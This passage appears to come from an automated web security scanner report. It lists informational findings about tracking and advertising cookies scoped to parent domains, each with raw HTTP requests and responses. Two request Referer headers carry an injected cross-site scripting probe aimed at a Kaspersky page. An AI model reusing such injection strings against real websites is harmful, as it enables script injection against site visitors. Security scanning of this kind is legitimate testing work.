BMX_BR=pid=&prad=&arc=&exp=1315144795; expires=Mon 05-Sep-2011 13:59:55 GMT; path=/; domain=.voicefive.com;
ar_exp=exp=2&initExp=Sun Sep 4 13:56:48 2011&recExp=Sun Sep 4 13:59:55 2011&; expires=Sat 03-Dec-2011 13:59:55 GMT; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/recruitBeacon.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Redirect
Server: nginx
Date: Sun, 04 Sep 2011 13:59:55 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: BMX_BR=pid=&prad=&arc=&exp=1315144795; expires=Mon 05-Sep-2011 13:59:55 GMT; path=/; domain=.voicefive.com;
Set-Cookie: ar_exp=exp=2&initExp=Sun Sep 4 13:56:48 2011&recExp=Sun Sep 4 13:59:55 2011&; expires=Sat 03-Dec-2011 13:59:55 GMT; path=/; domain=.voicefive.com;
Location: http://b.voicefive.com/p?c1=4&c2=&c3=&c4=&c5=&c6=2&c7=Sun%20Sep%20%204%2013%3A56%3A48%202011&c8=&c9=&c10=&c15=&rn=1315144795
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent
Content-Length: 0

9.16. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BMX_G=method%2D%3E%2D1%2Cts%2D%3E1315138425%2E221%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1315138425.221,wait-%3E10000,&1315138464748 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; BMX_G=method->-1,ts->1315138414; BMX_3PC=1; BMX_BR=pid=p82806590&prad=67008629&arc=40380915&exp=1315138417; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 12:13:47 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1315138425%2E221%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

9.17. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ar_p82806590=exp=1&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:34 2011&prad=67008633&arc=43678446&; expires=Sat 03-Dec-2011 12:13:34 GMT; path=/; domain=.voicefive.com;
BMX_G=method->-1,ts->1315138414; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=67008633&AR_C=43678446 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 12:13:34 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=1&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:34 2011&prad=67008633&arc=43678446&; expires=Sat 03-Dec-2011 12:13:34 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1315138414; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25155

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"67008633",Pid:"p82806590",Arc:"43678446",Location:CO
...[SNIP]...

9.18. http://at.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UA=AAAAAQAUW096xXu85Tl6d9LYI4dm0x0ReVYDA3gBY2BgYGRgOnWWgbXPkYHRXZWB4V4eAwODCFDYcPaTU41ANhj4Je1vYGBnYGDZwCjHyMCw8TKjNJBa1gmmNp5jFAPy1nmA5ZYvBVP5YUCDgcYYmaR_UoAYAgB1qxOw; Domain=.amgdgt.com; Expires=Tue, 04-Oct-2011 12:27:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=7893&rnd=657203058 HTTP/1.1
Host: at.amgdgt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com&d6626%22%3E%3Cscript%3Eprompt(%22E-Mail%22)%3C/script%3Eccf8d1d548d=1
Cookie: ID=AAAAAQAUHqYBDWyeyqBqE.cF1jqOLbPjn1oAAA1YFsfiLUo6rk5pJNfdIYQAAAExm.TKgQ--; UA=AAAAAQAUDOUeAcSbO68bjKCfD7WDxlOaqqEDA3gBY2BgYGRgOnWWgbXPkYHRXZWB4V4eAwODCFDYcPaTU41ANhj4Je1vYGBnYGDZwCjHyMCw8TKjNJBa1gmmNp5jFAPy1nmA5ZYvBVP5YYxAoxkYjUzS2Q9ADAEAcqQTZA--; LO=AAAAAQAUotqj15aS_QGuCXhIm1.jywXl56wBAHVzYTt0eDs2MjM7ZGFsbGFzOzc1MjA3O3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjticm9hZGJhbmQ7NTAuMjMuMTIzLjEwNg--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUW096xXu85Tl6d9LYI4dm0x0ReVYDA3gBY2BgYGRgOnWWgbXPkYHRXZWB4V4eAwODCFDYcPaTU41ANhj4Je1vYGBnYGDZwCjHyMCw8TKjNJBa1gmmNp5jFAPy1nmA5ZYvBVP5YUCDgcYYmaR_UoAYAgB1qxOw; Domain=.amgdgt.com; Expires=Tue, 04-Oct-2011 12:27:22 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ads.adrdgt.com/seg?add=95195&t=2
Content-Length: 0
Date: Sun, 04 Sep 2011 12:27:21 GMT

9.19. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 12:13:05 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=501322493&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.spamfighter.com%252FNews-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm%26jsref%3Dhttp%253A%252F%252Fwww.google.com%252F%2523sclient%253Dpsy%2526hl%253Den%2526tbm%253Dnws%2526source%253Dhp%2526q%253D%252522xss.cx%252522%2526pbx%253D1%2526oq%253D%252522xss.cx%252522%2526aq%253Df%2526aqi%253D%2526aql%253D%2526gs_sm%253De%2526gs_upl%253D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%2526fp%253D1%2526biw%253D1407%2526bih%253D931%2526bav%253Don.2%252Cor.r_gc.r_pw.%2526cad%253Db%26rnd%3D1315138414557&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.spamfighter.com%2FNews-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.spamfighter.com%2FNews-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm&jsref=http%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db&rnd=1315138414557
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 04 Sep 2011 12:13:05 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 12:13:05 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

9.20. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=9951d9b8-80.67.74.150-1314793633"; expires=Tue, 03-Sep-2013 12:17:40 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035308&d.c=gif&d.o=computerworldcom&d.x=221047586&d.t=page&d.u=http%3A%2F%2Fblogs.computerworld.com%2F18810%2Fhappy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack&d.r=http%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 12:17:40 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633"; expires=Tue, 03-Sep-2013 12:17:40 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

9.21. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=9cc29993-80.67.74.150-1314836282; expires=Tue, 03-Sep-2013 12:15:14 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p82806590&c3=67008633&c4=43678446&c5=1&c6=1&c7=Sun%20Sep%20%204%2012%3A13%3A34%202011&c8=http%3A%2F%2Fsearchsecurity.techtarget.com%2Ftip%2FAddressing-the-dangers-of-JavaScript-in-the-enterprise&c9=Addressing%20the%20dangers%20of%20JavaScript%20in%20the%20enterprise&c10=http%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db&c15=&1315138452385 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; UID=9cc29993-80.67.74.150-1314836282; ar_p82806590=exp=1&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:34 2011&prad=67008633&arc=43678446&; BMX_G=method->-1,ts->1315138414; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 04 Sep 2011 12:15:14 GMT
Connection: close
Set-Cookie: UID=9cc29993-80.67.74.150-1314836282; expires=Tue, 03-Sep-2013 12:15:14 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

9.22. http://b.voicefive.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=9cc29993-80.67.74.150-1314836282"; expires=Tue, 03-Sep-2013 12:15:25 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=4&c2=p82806590&c3=67008629&c4=40380915&c5=&c6=2&c7=Sun%20Sep%20%204%2012%3A13%3A34%202011&c8=&c9=&c10=&c15=&rn=1315138417 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; BMX_G=method->-1,ts->1315138414; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_BR=pid=p82806590&prad=67008629&arc=40380915&exp=1315138417; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 12:15:25 GMT
Connection: close
Set-Cookie: UID=9cc29993-80.67.74.150-1314836282"; expires=Tue, 03-Sep-2013 12:15:25 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

9.23. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/ActivityServer.bs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

u2=7687262b-9a6b-4048-9b55-2203b03ea4123Jl01g; expires=Sat, 03-Dec-2011 08:26:31 GMT; domain=.serving-sys.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/ActivityServer.bs?cn=as&ActivityID=136009&rnd=239835.96117574567 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com&d6626%22%3E%3Cscript%3Eprompt(%22E-Mail%22)%3C/script%3Eccf8d1d548d=1
Cookie: A3=mlojbe9y0cbS00001nvHZbdR704uw00001n7kibdnz043+00002niq1bnCO07l000001mWv4bkxO0ck.00002m+0Wbn.r0cAp00001lYxfbgHz0cie00001nleJbdja0ce100001mdrxbe9J076N00002n3tlbe9y0d8c00001nqcRbkxM02Hn00000nUMnbjmD0dR+00002mPTKbk4Q0avM00001mR0dbdjt0aL000000ntgWbmuC07tg00001nizjbnCD07l000001lO6cbdjI0aL000000mTvtbiBp04uw00001; B3=bthx0000000002vU94o40000000002wlb0K60000000001vWboiG0000000002wcaVxT0000000001w1b5S80000000001vWb2G20000000002vWbD0T0000000000wcaNAf0000000000vU52DM0000000001w7bqqZ0000000001vVbmkW0000000001wbbGrM0000000002w9bB6I0000000001vUbEgM0000000001wibdQV0000000001wmbnhH0000000000vU; u2=7687262b-9a6b-4048-9b55-2203b03ea4123Jl01g; C4=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=7687262b-9a6b-4048-9b55-2203b03ea4123Jl01g; expires=Sat, 03-Dec-2011 08:26:31 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 04 Sep 2011 12:26:31 GMT
Connection: close
Content-Length: 14

// Do Nothing

9.24. http://buy.norton.com/ps_ant_de_de_eset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/ps_ant_de_de_eset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PROGRAMID_CREATED_DATE=09-04-2011; domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
LASTTIME_CV_DATE=Sep-04-2011 06:59:59; domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ps_ant_de_de_eset HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Sun, 04 Sep 2011 13:59:59 GMT
Location: http://antivirus.norton.com/norton/ps/comp_de_de_eset.html
Set-Cookie: COUNTRY=US; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-04-2011; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: FIRSTTIME_CV_DATE=Sep-04-2011 06:56:51; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-04-2011 06:56:51; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-04-2011; domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-04-2011 06:59:59; domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Monday, 03-Sep-2012 13:59:59 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 311

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://antivirus.norton.com/norton
...[SNIP]...

9.25. http://clk.atdmt.com/MRT/go/341816816/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/MRT/go/341816816/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3:903d/15148:7bcf/2b53b; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12:da889cf/15148/fa4a3c6/903d/4e6383a6:d76e462/2b53b/145fb5f0/7bcf/4e638463; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MRT/go/341816816/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.microsoft.com/en-us/cloud/cloudpowersolutions/private_cloud.aspx?fbid=LlzJjjrNDPl
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3:903d/15148:7bcf/2b53b; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12:da889cf/15148/fa4a3c6/903d/4e6383a6:d76e462/2b53b/145fb5f0/7bcf/4e638463; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sun, 04 Sep 2011 14:00:03 GMT
Connection: close

9.26. http://clk.atdmt.com/go/262448070/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/go/262448070/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3:7bcf/2b53b:903d/15148; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12:d76e462/2b53b/145fb5f0/7bcf/4e638463:da889cf/15148/fa4a3c6/903d/4e638463; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/262448070/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://adt.com/special-offer?ecid=rfresidm000021&pub=google&media=display
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
